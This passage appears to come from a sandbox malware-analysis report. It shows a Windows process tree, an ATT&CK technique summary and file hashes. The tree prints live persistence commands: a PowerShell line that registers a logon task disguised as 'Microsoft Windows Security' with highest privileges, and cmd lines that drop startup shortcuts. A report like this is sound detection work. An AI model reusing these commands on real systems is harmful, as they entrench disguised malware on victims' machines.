C:\Windows\system32\msg.exemsg * virus5⤵PID:39844
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39832
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15124
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15252
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15292
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15324
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8408
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8516
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39960
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39988
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40020
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40064
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40124
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40164
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40216
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40244
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40276
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40328
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40356
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40388
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40432
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40464
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40492
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40576
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40628
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40672
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:22268
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40512
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40520
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:3948
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:4748
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:4280
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40600
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:2284
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:864
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:4796
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:4356
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:1508
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40840
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:4332
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40884
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40932
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40696
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40692
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8608
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8540
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40892
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8624
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8612
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8640
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:40948
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8556
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8628
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:1812
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:3156
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8804
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8876
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8884
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:9004
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:9128
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:3628
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:9140
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:644
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:9136
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15384
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15428
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15460
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31052
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31088
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31140
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31176
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31520
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31452
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31396
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31332
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31292
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31220
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31576
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31632
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31672
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31732
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32484
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32516
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15536
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32472
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15568
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15584
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:31892
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32084
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32176
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32424
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32236
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15828
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32288
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32320
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15772
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15836
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15816
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15844
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15744
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15800
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32636
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32648
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32360
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15864
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32660
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33504
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33536
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33568
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33600
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33636
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33668
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33712
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33752
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8076
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8100
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:8168
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:3728
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33796
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33324
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33280
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33224
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34356
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33976
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34008
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34040
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33192
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34052
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34080
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34132
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34100
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34164
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:35728
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33056
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33088
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33128
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33168
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34204
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:35684
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33908
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34244
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34276
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34420
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:35864
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32980
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33016
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:33896
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34476
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34448
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:35968
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34520
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:36008
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32912
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34552
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:36088
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:36120
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32724
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34596
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32800
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32744
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:32832
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34648
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34616
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:36304
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34736
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34928
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14860
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:35496
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15492
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15412
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15424
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14892
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14924
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:34296
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:37972
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15928
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38032
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38060
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38092
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:35352
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38148
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38172
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15976
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15984
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:16000
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:16048
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38516
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15936
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38328
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:2224
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:2648
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38648
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:2616
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39028
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38984
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38940
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38860
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38796
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39136
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39076
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38740
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39096
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39160
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:1560
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39372
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39340
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39304
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39272
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39472
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39428
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:2376
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:19644
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:19972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"3⤵PID:13760
-
-
C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"3⤵PID:38552
-
-
C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"3⤵PID:15116
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:18640
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:18912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:19128
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:19316
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:19336
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url" & echo URL="C:\Users\Admin\AppData\Local\StreamFlow Dynamics\VibeStream.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url" & exit2⤵
- Drops startup file
PID:37804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:2028
-
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureCloud Harbor Inc\SafeHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & exit2⤵PID:9168
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:15448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:19668
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:18968
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:23924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 6136 -ip 61361⤵PID:7088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 24260 -ip 242601⤵PID:7372
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵PID:10908
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵PID:26312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 25436 -ip 254361⤵PID:26576
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵PID:7908
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:36044
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:36184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 12888 -ip 128881⤵PID:12992
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵PID:31108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 35200 -ip 352001⤵PID:33840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 35200 -ip 352001⤵PID:14968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k DcomLaunch1⤵PID:38320
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵PID:39504
-
C:\ProgramData\ljgx\fgihp.exeC:\ProgramData\ljgx\fgihp.exe1⤵PID:2144
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
7Discovery
Browser Information Discovery
1Process Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
Filesize
2KB
MD58f0271a63446aef01cf2bfc7b7c7976b
SHA1b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7
SHA256da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c
SHA51278a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD5f426165d1e5f7df1b7a3758c306cd4ae
SHA159ef728fbbb5c4197600f61daec48556fec651c1
SHA256b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841
SHA5128d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6
-
Filesize
152B
MD56960857d16aadfa79d36df8ebbf0e423
SHA1e1db43bd478274366621a8c6497e270d46c6ed4f
SHA256f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32
SHA5126deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize168B
MD5f5fee72da43bad4feafff59cfb805510
SHA1a79c078a8c25e2a4d987b51290848f1065bf90c8
SHA256bcdeedd7d51c7452765d8e14939a335dd5b9b38ae06f4f87778eba521868191c
SHA512fa18340d24a6a9c29960155adb2f8a011fd6c372235df6a248f08e42cb6564d114544e72faa05671857159f9465542d5d21cc533641de94897cb04916f53da4b
-
Filesize
5KB
MD546bf39db121b1e020a55898c5fda0cd7
SHA1155fc2c115fbaf2a596e1d2f5021e528f2f396a8
SHA2564b6c61cb81437e7aa39d37dfba1b91a29535f29528318f096d7f06e1277509b1
SHA512a8452cd01d9036216d964b8b37881eefa145bcacd129b48417bb747eddae68c2d9bff113ef3c1544148e34449d4f852e99eb3c2fa7bb564c694748a5d18ee4c4
-
Filesize
6KB
MD5c0f4a7d698dc058d5db9d5d00c377cc7
SHA128314bf4b81cec23ed8b1263b1235c6b14675030
SHA256b47525d82360c7297e0d5d934269a265a31852676307099870204c3874fbee22
SHA5121550646cd697e490f505f2132b11fa910cbecf43e40f85c2ebef188a9666277de035cef25a56331238718af7ae15611bfca7fe05afd29e1bf672e21411522c6f
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD52fe2b285a59f294965587b62475cb82d
SHA1d55380bbd3d53ae9a9ada9ecd19b4c02896ba851
SHA2565c74970a991acd086b6596399f1bf7f9c4a1f409608a11cfc85d16aa56a5ce96
SHA512d7a7417f1f0168865974426d3a5cdbafaa7a7a46dd162d795ca5ca6fd2fc5da17b173b6234dc2d03571ca37aa451af880773b1fb91a4b86261d46a14825fc656
-
Filesize
10KB
MD5b94940532bae2420d1eb2ce9b6d2a0db
SHA180a6cf4cba5d2c33ccd3a0f8a399ae35b8963716
SHA256be6120c2879d1aacdb04b6fb5f5c7da706d42d6675ecee8f003a6382f0aebd45
SHA512f1d9504561a63c29b91226f7691476da6497d2455a5c1dc2ea27bf3a3e975c09eb13cb8aa580559f336927be0d64af664b48a2f00877cd01bcb3dfa7d02efded
-
Filesize
108KB
MD51fcb78fb6cf9720e9d9494c42142d885
SHA1fef9c2e728ab9d56ce9ed28934b3182b6f1d5379
SHA25684652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02
SHA512cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3
-
Filesize
18KB
MD529f71fcf16fcece0b42a5c42f79517c5
SHA1f1635ae3b10f3cd81de2c2a5c0b4a0c9274cd679
SHA256d81a16c3de1a5e2d7ce22c224b7518cd40f9171c94faa6c79c98af80508fc740
SHA5123f1851cf375825c9a8281d37662a899566216a549d394b38489532dd78c26ab0042e203469d9170f0f3cb9e0974a6e3ce589e63bd8dfeab4be044dbc4b70a8a9
-
Filesize
1.0MB
MD5c63860691927d62432750013b5a20f5f
SHA103678170aadf6bab2ac2b742f5ea2fd1b11feca3
SHA25669d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353
SHA5123357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de
-
Filesize
3.6MB
MD5f978d5eba9977af32374dcb616cb63fe
SHA1d45c19f173d68fb11dd1c358b42b135e634ebe4e
SHA2562921409fa28850e3c1874ae52a25b00f93961c278cf131f11f67cee89061f7c8
SHA5120075c468db47b8f92b9d329089a61fd554c5f7fc374be34fcff8f925dba334ba41bab09303e16d32607597af5e2636203db312c412fc68b3bee60a799620fe9f
-
Filesize
630KB
MD5e477a96c8f2b18d6b5c27bde49c990bf
SHA1e980c9bf41330d1e5bd04556db4646a0210f7409
SHA25616574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
